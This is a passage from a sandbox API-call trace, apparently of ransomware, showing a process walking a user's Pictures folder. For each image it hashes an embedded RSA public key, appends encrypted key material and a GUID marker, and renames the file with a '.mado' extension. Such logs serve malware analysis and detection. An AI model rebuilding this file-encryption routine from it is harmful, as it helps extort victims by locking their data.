returned 1 [0205.507] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.507] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.507] CloseHandle (hObject=0x63c) returned 1 [0205.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.508] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\oo_VqMKwcxPCKD6B.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\oo_vqmkwcxpckd6b.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\oo_VqMKwcxPCKD6B.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\oo_vqmkwcxpckd6b.gif.mado")) returned 1 [0205.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.509] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.510] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95eb35c0, ftCreationTime.dwHighDateTime=0x1d5e4ae, ftLastAccessTime.dwLowDateTime=0x72ab150, ftLastAccessTime.dwHighDateTime=0x1d5d8e0, ftLastWriteTime.dwLowDateTime=0x72ab150, ftLastWriteTime.dwHighDateTime=0x1d5d8e0, nFileSizeHigh=0x0, nFileSizeLow=0x8194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O_IJxaE0P.bmp", cAlternateFileName="O_IJXA~1.BMP")) returned 1 [0205.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670f0 | out: hHeap=0x2c0000) returned 1 [0205.510] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\O_IJxaE0P.bmp") returned=".bmp" [0205.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\O_IJxaE0P.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\o_ijxae0p.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.510] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=33172) returned 1 [0205.510] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.513] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x816e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.513] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.514] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.514] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8194, lpOverlapped=0x0) returned 1 [0205.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.515] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.516] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.516] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.516] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.516] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.516] GetLastError () returned 0x0 [0205.516] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.516] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.516] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.516] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.516] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8190) returned 0x3b81690 [0205.516] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b663d8 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe898 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66420 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8e0 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe928 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8f8 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.517] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8e0 | out: hHeap=0x2c0000) returned 1 [0205.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8f8 | out: hHeap=0x2c0000) returned 1 [0205.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe928 | out: hHeap=0x2c0000) returned 1 [0205.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe928 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe8f8 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe8e0 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b75a80 [0205.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b75b98 [0205.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0205.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8f8 | out: hHeap=0x2c0000) returned 1 [0205.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.518] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8194, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.518] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.518] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.518] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.518] CloseHandle (hObject=0x63c) returned 1 [0205.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.523] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\O_IJxaE0P.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\o_ijxae0p.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\O_IJxaE0P.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\o_ijxae0p.bmp.mado")) returned 1 [0205.524] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa800c640, ftCreationTime.dwHighDateTime=0x1d5dc38, ftLastAccessTime.dwLowDateTime=0xe4ac9aa0, ftLastAccessTime.dwHighDateTime=0x1d5dc02, ftLastWriteTime.dwLowDateTime=0xe4ac9aa0, ftLastWriteTime.dwHighDateTime=0x1d5dc02, nFileSizeHigh=0x0, nFileSizeLow=0xc0be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="radEYe6duwup.png", cAlternateFileName="RADEYE~1.PNG")) returned 1 [0205.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.524] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\radEYe6duwup.png") returned=".png" [0205.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\radEYe6duwup.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\radeye6duwup.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.524] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=49342) returned 1 [0205.524] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.527] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xc098, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.527] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.528] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xc0be, lpOverlapped=0x0) returned 1 [0205.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.529] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.530] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.530] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.530] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.530] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.530] GetLastError () returned 0x0 [0205.530] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.530] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.530] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.530] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.530] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.530] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.531] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xc0be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.531] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.531] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.531] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.531] CloseHandle (hObject=0x63c) returned 1 [0205.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.532] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\radEYe6duwup.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\radeye6duwup.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\radEYe6duwup.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\radeye6duwup.png.mado")) returned 1 [0205.534] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e63900, ftCreationTime.dwHighDateTime=0x1d5e1e4, ftLastAccessTime.dwLowDateTime=0x9bb9e990, ftLastAccessTime.dwHighDateTime=0x1d5dc04, ftLastWriteTime.dwLowDateTime=0x9bb9e990, ftLastWriteTime.dwHighDateTime=0x1d5dc04, nFileSizeHigh=0x0, nFileSizeLow=0x14ca9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V0zNn L8xo47.png", cAlternateFileName="V0ZNNL~1.PNG")) returned 1 [0205.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.534] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\V0zNn L8xo47.png") returned=".png" [0205.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\V0zNn L8xo47.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\v0znn l8xo47.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.534] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=85161) returned 1 [0205.534] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.536] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14c83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.536] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.538] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14ca9, lpOverlapped=0x0) returned 1 [0205.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.538] lstrlenA (lpString="-----BEGIN PUBLIC 